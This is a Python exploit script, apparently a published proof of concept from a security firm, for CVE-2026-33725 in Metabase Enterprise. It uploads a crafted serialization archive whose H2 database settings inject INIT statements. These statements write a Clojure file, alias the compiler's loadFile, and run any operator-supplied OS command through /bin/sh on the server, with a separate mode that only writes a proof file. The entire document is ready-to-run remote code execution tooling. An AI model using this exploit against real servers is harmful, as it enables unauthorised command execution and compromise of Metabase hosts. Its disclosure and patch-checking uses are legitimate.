# Hakai Security - https://hakaisecurity.io # Authors: # - Diego Tellaroli # - Guilherme d'Ávila # - Gabriel Rodrigues # # Created on: 2026-04-20 # Description: Exploit for CVE-2026-33725 - Metabase vulnerable to RCE and Arbitrary File Read via H2 JDBC INIT Injection in EE Serialization Import #!/usr/bin/env python3 import argparse, io, tarfile, time, requests, urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TS = int(time.time()) def banner(): b = """ _____________________________________________________________________________________ ______ ___ _________ ___ ____ _____ ___ / / /_/ |___/ //_/_/ |__/ _/ / RCE and Arbitrary File Read in Metabase / __ /_/ /__ /| |__ , <__ /| | _/ / / CVE - 2026 - 33725 / _ __ /_ ___ |_ /| |_ ___ |__/ / / https://hakaisecurity.io / /_/ /_/ /_/ |_|/_/ |_|/_/ |_|/___/ / / ________________________________________________________________________________ """ print(b) def db_yaml(name, subname): return f"""\ name: {name} engine: h2 description: poc settings: {{}} serdes/meta: - id: {name} model: Database details: db: mem:x subname: |- {subname} """ def cmd_to_clj(cmd): """Encode string as Clojure char literals to avoid quotes in CSVWRITE output. Double backslash because H2 URL parser strips one level: \\\\c -> \\c.""" special = {' ': 'space', '\n': 'newline', '\t': 'tab'} parts = [] for c in cmd: if c in special: parts.append(f"\\\\{special[c]}") elif c == '\\': parts.append("\\\\\\\\") else: parts.append(f"\\\\{c}") return "(str " + " ".join(parts) + ")" def build_rce_clj(cmd): """Build Clojure source that runs an OS command via clojure.java.shell/sh.""" return ( "(require (quote clojure.java.shell))" f"(clojure.java.shell/sh {cmd_to_clj('/bin/sh')} {cmd_to_clj('-c')} {cmd_to_clj(cmd)})" ) def build_targz(entries): """entries: list of (db_name, yaml_content).""" buf = io.BytesIO() with tarfile.open(fileobj=buf, mode="w:gz") as tar: for d in ["export/", "export/databases/"]: ti = tarfile.TarInfo(d); ti.type = tarfile.DIRTYPE; tar.addfile(ti) for name, yaml in entries: d = f"export/databases/{name}/" ti = tarfile.TarInfo(d); ti.type = tarfile.DIRTYPE; tar.addfile(ti) data = yaml.encode() ti = tarfile.TarInfo(f"export/databases/{name}/{name}.yaml") ti.size = len(data) tar.addfile(ti, io.BytesIO(data)) buf.seek(0) return buf def find_db(s, base, name): r = s.get(f"{base}/api/database") if r.ok: for db in r.json().get("data", r.json() if isinstance(r.json(), list) else []): if db.get("name") == name: return db["id"] return None def delete_db(s, base, name): db_id = find_db(s, base, name) if db_id: s.delete(f"{base}/api/database/{db_id}") def trigger(s, base, db_id): """Force JDBC connection -> fires H2 INIT.""" s.post(f"{base}/api/database/{db_id}/sync_schema") s.post(f"{base}/api/database/{db_id}/rescan_values") s.post(f"{base}/api/dataset", json={ "database": db_id, "type": "native", "native": {"query": "SELECT 1"} }) def do_import(s, base, entries): """Import tar.gz, return (status_code, body).""" s.headers.pop("Content-Type", None) r = s.post(f"{base}/api/ee/serialization/import", files={"file": ("export.tar.gz", build_targz(entries), "application/gzip")}) s.headers["Content-Type"] = "application/json" return r.status_code, r.text[:3000] def main(): banner() p = argparse.ArgumentParser(description="CVE-2026-33725: H2 INIT injection via EE serdes import") p.add_argument("url", help="Metabase base URL") p.add_argument("token", help="Admin session token") p.add_argument("--cmd", help="OS command for RCE (Clojure loadFile, no javac)") p.add_argument("--outfile", default="/tmp/metabase_poc_pwned.txt", help="Proof file (safe mode)") p.add_argument("--dry-run", action="store_true", help="Only check endpoint") p.add_argument("--proxy", help="HTTP proxy") a = p.parse_args() base = a.url.rstrip("/") s = requests.Session() s.headers.update({"Content-Type": "application/json", "X-Metabase-Session": a.token}) if a.proxy: s.proxies = {"http": a.proxy, "https": a.proxy}; s.verify = False # Check EE r = s.post(f"{base}/api/ee/serialization/import") if r.status_code == 404: print("[SAFE] OSS build — endpoint not available"); return elif r.status_code == 402: print("[INFO] EE build (needs license)") else: print(f"[INFO] Endpoint returned HTTP {r.status_code}") if a.dry_run: return if a.cmd: # ── RCE: single-INIT three-statement chain ── # All in one file-based H2 INIT: CSVWRITE -> CREATE ALIAS -> CALL loadFile # File-based H2 serializes connections, avoiding CREATE ALIAS race. print(f"[INFO] RCE: {a.cmd}") clj_file = f"/tmp/.poc_{TS}.clj" h2_file = f"/tmp/.poc_{TS}_h2" name = f"poc_rce_{TS}" clj_src = build_rce_clj(a.cmd) sql_inner = clj_src.replace("'", "''''") csvwrite = f"CALL CSVWRITE('{clj_file}', 'SELECT ''{sql_inner}'' AS c', 'writeColumnHeader=false fieldDelimiter=')" create_alias = 'CREATE ALIAS IF NOT EXISTS LOADCLJ FOR "clojure.lang.Compiler.loadFile"' call_load = f"CALL LOADCLJ('{clj_file}')" # \; separates statements in H2 INIT subname = f"{h2_file};INIT={csvwrite}\\;{create_alias}\\;{call_load}" delete_db(s, base, name) code, body = do_import(s, base, [(name, db_yaml(name, subname))]) print(f"[INFO] Import: HTTP {code}") if code == 402: print("[INFO] License required"); return if code != 200 or "assert-not-h2" in body.lower(): print(body[:500]); print("[SAFE] Patched or import failed"); return time.sleep(2) db_id = find_db(s, base, name) if db_id: trigger(s, base, db_id) print(f"\n[VULN] RCE via H2 INIT subname bypass + Clojure loadFile") print(f"[INFO] Verify: check if '{a.cmd}' executed on the server") else: print("[WARN] DB not found after import") else: # ── Safe mode: CSVWRITE proof file ── name = f"poc_safe_{TS}" sub = f"mem:s{TS};INIT=CALL CSVWRITE('{a.outfile}', 'SELECT ''PWNED_VIA_H2_INIT'' AS result')" delete_db(s, base, name) code, body = do_import(s, base, [(name, db_yaml(name, sub))]) print(f"[INFO] Import: HTTP {code}") if code == 402: print("[INFO] License required"); return if code != 200: print(body[:500]); return if "assert-not-h2" in body.lower(): print("[SAFE] Patched (H2 rejected)"); return time.sleep(2) db_id = find_db(s, base, name) if db_id: trigger(s, base, db_id) print(f"\n[VULN] CSVWRITE via H2 INIT subname bypass") print(f"[INFO] Check: {a.outfile}") else: print("[WARN] DB not found after import") if __name__ == "__main__": main()